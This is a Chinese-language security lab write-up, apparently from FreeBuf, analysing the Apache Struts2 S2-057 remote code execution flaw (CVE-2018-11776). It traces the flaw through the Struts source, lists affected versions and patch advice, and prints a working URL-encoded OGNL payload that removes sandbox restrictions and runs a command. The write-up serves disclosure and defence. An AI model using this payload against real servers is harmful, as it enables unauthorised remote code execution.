<h2 style="box-sizing: border-box; font-family: 微软雅黑; font-weight: bold; line-height: 1.1; color: rgb(55, 56, 56); margin-top: 30px; margin-bottom: 15px; font-size: 18px;">前言</h2><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; font-weight: 700; color: rgb(0, 176, 80);">Apache Struts框架是一个基于 Java Servlets,JavaBeans, 和 JavaServer Pages (JSP)的Web应用框架的开源项目，Struts基于Model-View-Controller (MVC)的设计模式，可以用来构件复杂的Web应用。它允许我们分解一个应用程序的商业逻辑、控制逻辑和表现逻辑的代码，使它的重用性和维护性更好。Struts框架是Jakarta工程的一部分，由Apache软件基金会管理。</span></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; font-weight: 700; color: rgb(0, 176, 80);">天融信阿尔法实验室将为你带来Apache Struts2 S2-057远程代码执行漏洞分析~</span></p><h2 style="box-sizing: border-box; font-family: 微软雅黑; font-weight: bold; line-height: 1.1; color: rgb(55, 56, 56); margin-top: 30px; margin-bottom: 15px; font-size: 18px;">一、&nbsp;漏洞描述</h2><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">当struts.mapper.alwaysSelectFullNamespace设置为true，并且package标签页以及result的param标签页的namespace值的缺失，或使用了通配符时可造成namespace被控制，最终namespace会被带入OGNL语句执行，从而产生远程代码执行漏洞。</p><h3 style="box-sizing: border-box; font-family: 微软雅黑; font-weight: bold; line-height: 1.1; color: rgb(0, 112, 192); margin-top: 20px; margin-bottom: 15px; font-size: 16px;">1. 受影响的系统版本</h3><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">Apache Struts 2.3 – Struts 2.3.34</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">Apache Struts 2.5 – Struts 2.5.16</p><h3 style="box-sizing: border-box; font-family: 微软雅黑; font-weight: bold; line-height: 1.1; color: rgb(0, 112, 192); margin-top: 20px; margin-bottom: 15px; font-size: 16px;">2. 漏洞编号</h3><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">CVE-2018-11776</p><h2 style="box-sizing: border-box; font-family: 微软雅黑; font-weight: bold; line-height: 1.1; color: rgb(55, 56, 56); margin-top: 30px; margin-bottom: 15px; font-size: 18px;">二、环境搭建</h2><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">1.下载：<a href="http://archive.apache.org/dist/struts/2.3.34/struts-2.3.34-all.zip" style="box-sizing: border-box; background: 0px 0px; color: rgb(6, 154, 239); text-decoration-line: underline;">http://archive.apache.org/dist/struts/2.3.34/struts-2.3.34-all.zip</a></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">2. 修改配置文件struts-actionchaining.xml</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">该漏洞有多种攻击向量包括：</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word;">Redirect action</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word;">Action chaining</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 0px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word;">Postback result</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">以第一种为例子，修改配置文件内容为：</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><a href="http://image.3001.net/images/20180824/1535104197_5b7fd4c50d9d3.png" class="highslide-image" target="_blank" style="box-sizing: border-box; background: 0px 0px; color: rgb(6, 154, 239); text-decoration-line: underline;"><img alt="修改配置文件内容" src="http://image.3001.net/images/20180824/1535104197_5b7fd4c50d9d3.png!small" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></a></p><h2 style="box-sizing: border-box; font-family: 微软雅黑; font-weight: bold; line-height: 1.1; color: rgb(55, 56, 56); margin-top: 30px; margin-bottom: 15px; font-size: 18px;">三、漏洞细节</h2><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">在DefaultActionMapper这个类的parseNameAndNamespace方法里。</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><a href="http://image.3001.net/images/20180824/1535104208_5b7fd4d097c75.png" class="highslide-image" target="_blank" style="box-sizing: border-box; background: 0px 0px; color: rgb(6, 154, 239); text-decoration-line: underline;"><img alt="parseNameAndNamespace方法" src="http://image.3001.net/images/20180824/1535104208_5b7fd4d097c75.png!small" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></a></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">当alwaysSelectFullNamespace被设置为true时，namespace的值是从URL中获取的。URL是可控的，所以namespace也是可控的。</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">Action执行结束之后，程序会调用ServletActionRedirectResult类中的execute()方法进行重定向Result的解析。</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><a href="http://image.3001.net/images/20180824/1535104218_5b7fd4da0b70d.png" class="highslide-image" target="_blank" style="box-sizing: border-box; background: 0px 0px; color: rgb(6, 154, 239); text-decoration-line: underline;"><img alt="进行重定向Result的解析" src="http://image.3001.net/images/20180824/1535104218_5b7fd4da0b70d.png!small" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></a></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">首先，当namespace为空时，调用invocation.getProxy().getNamespace()赋值给变量namespace，然后将变量namespace传入ActionMapping构造函数中。</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><a href="http://image.3001.net/images/20180824/1535104222_5b7fd4de51dfe.png" class="highslide-image" target="_blank" style="box-sizing: border-box; background: 0px 0px; color: rgb(6, 154, 239); text-decoration-line: underline;"><img alt="传入ActionMapping构造函数" src="http://image.3001.net/images/20180824/1535104222_5b7fd4de51dfe.png!small" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></a></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">然后，ActionMapper.getUriFromActionMapping()对ActionMapping后的值进行重组，生成一个URL字符串（包含namespace），并赋值给了tmplocation变量。</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><a href="http://image.3001.net/images/20180824/1535104228_5b7fd4e45257f.png" class="highslide-image" target="_blank" style="box-sizing: border-box; background: 0px 0px; color: rgb(6, 154, 239); text-decoration-line: underline;"><img alt="赋值给了tmplocation" src="http://image.3001.net/images/20180824/1535104228_5b7fd4e45257f.png!small" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></a></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">紧接着将带有namespace的tmplocation传入了setLocation()方法中。</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><a href="http://image.3001.net/images/20180824/1535104233_5b7fd4e978504.png" class="highslide-image" target="_blank" style="box-sizing: border-box; background: 0px 0px; color: rgb(6, 154, 239); text-decoration-line: underline;"><img alt="传入了setLocation()方法" src="http://image.3001.net/images/20180824/1535104233_5b7fd4e978504.png!small" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></a></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">该方法将tmpLocation值赋值给了StrutsResultSupport类中的location变量。</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">然后，跟踪super.execute()方法。</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><a href="http://image.3001.net/images/20180824/1535104246_5b7fd4f67233c.png" class="highslide-image" target="_blank" style="box-sizing: border-box; background: 0px 0px; color: rgb(6, 154, 239); text-decoration-line: underline;"><img alt="跟踪super.execute()方法" src="http://image.3001.net/images/20180824/1535104246_5b7fd4f67233c.png!small" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></a></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">继续跟踪ServletActionResult类中的super.execute()。</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><a href="http://image.3001.net/images/20180824/1535104254_5b7fd4fe9f497.png" class="highslide-image" target="_blank" style="box-sizing: border-box; background: 0px 0px; color: rgb(6, 154, 239); text-decoration-line: underline;"><img alt="跟踪ServletActionResult类中的super.execute" src="http://image.3001.net/images/20180824/1535104254_5b7fd4fe9f497.png!small" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></a></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">在StrutsResultSupport类中的execute()方法中，刚刚被赋值的location变量（带有namespace的）被传入了conditionalParse()方法。</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><a href="http://image.3001.net/images/20180824/1535104259_5b7fd5034831c.png" class="highslide-image" target="_blank" style="box-sizing: border-box; background: 0px 0px; color: rgb(6, 154, 239); text-decoration-line: underline;"><img alt="传入了conditionalParse()方法" src="http://image.3001.net/images/20180824/1535104259_5b7fd5034831c.png!small" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></a></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">最终，通过TextParseUtil.translateVariables()对namespace进行OGNL解析，导致远程代码执行漏洞。</p><h2 style="box-sizing: border-box; font-family: 微软雅黑; font-weight: bold; line-height: 1.1; color: rgb(55, 56, 56); margin-top: 30px; margin-bottom: 15px; font-size: 18px;">四、漏洞利用</h2><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">1. 访问url 为/${(111+111)}/actionChain1.action的地址。</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><a href="http://image.3001.net/images/20180824/1535104265_5b7fd50985775.png" class="highslide-image" target="_blank" style="box-sizing: border-box; background: 0px 0px; color: rgb(6, 154, 239); text-decoration-line: underline;"><img alt="访问url 为/${(111+111)}/actionChain1.action" src="http://image.3001.net/images/20180824/1535104265_5b7fd50985775.png!small" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></a></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">访问触发OGNL表达式，url变为/222/register2.action，漏洞存在。</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">2. payload：</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"></p><pre style="box-sizing: border-box; overflow: auto; font-family: Menlo, Monaco, Consolas, "Courier New", monospace; font-size: 13px; padding: 9.5px; margin-top: 0px; margin-bottom: 15px; line-height: 1.42857; color: rgb(51, 51, 51); word-break: break-all; word-wrap: break-word; background-color: rgb(243, 243, 243); border: 1px solid rgb(228, 228, 228); border-radius: 4px;">%24%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23ct%3d%23request%5b%27struts.valueStack%27%5d.context).(%23cr%3d%23ct%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ou%3d%23cr.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ou.getExcludedPackageNames().clear()).(%23ou.getExcludedClasses().clear()).(%23ct.setMemberAccess(%23dm)).(%23cmd%3d%40java.lang.Runtime%40getRuntime().exec(%22calc%22))%7d</pre><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"></p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">此payload 仅适用于2.3系列版本。</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><a href="http://image.3001.net/images/20180824/1535104272_5b7fd5103bcfb.png" class="highslide-image" target="_blank" style="box-sizing: border-box; background: 0px 0px; color: rgb(6, 154, 239); text-decoration-line: underline; outline: 0px;"><img alt="payload" src="http://image.3001.net/images/20180824/1535104272_5b7fd5103bcfb.png!small" width="690" style="box-sizing: border-box; border: 0px; vertical-align: middle; max-width: 100%; display: block; margin: 15px auto;"/></a></p><h2 style="box-sizing: border-box; font-family: 微软雅黑; font-weight: bold; line-height: 1.1; color: rgb(55, 56, 56); margin-top: 30px; margin-bottom: 15px; font-size: 18px;">五、修复建议</h2><h3 style="box-sizing: border-box; font-family: 微软雅黑; font-weight: bold; line-height: 1.1; color: rgb(0, 112, 192); margin-top: 20px; margin-bottom: 15px; font-size: 16px;">1. 官方补丁</h3><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">目前官方已发布最新版本来修复此漏洞，受影响的用户请尽快升级到Apache Struts 2.3.35 或 Struts 2.5.17版本：<a href="https://struts.apache.org/download.cgi#struts2517" style="box-sizing: border-box; background: 0px 0px; color: rgb(6, 154, 239); text-decoration-line: underline;">https://struts.apache.org/download.cgi#struts2517</a>。</p><h3 style="box-sizing: border-box; font-family: 微软雅黑; font-weight: bold; line-height: 1.1; color: rgb(0, 112, 192); margin-top: 20px; margin-bottom: 15px; font-size: 16px;">2. 手工修复</h3><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">修改配置文件：</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;">固定package标签页以及result的param标签页的namespace值，以及禁止使用通配符。</p><p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; font-size: 15px; line-height: 26px; word-wrap: break-word; word-break: break-word; color: rgb(88, 88, 88); font-family: 微软雅黑;"><span style="box-sizing: border-box; font-weight: 700; color: rgb(159, 163, 168);">*本文作者：alphalab，转载请注明来自FreeBuf.COM</span></p>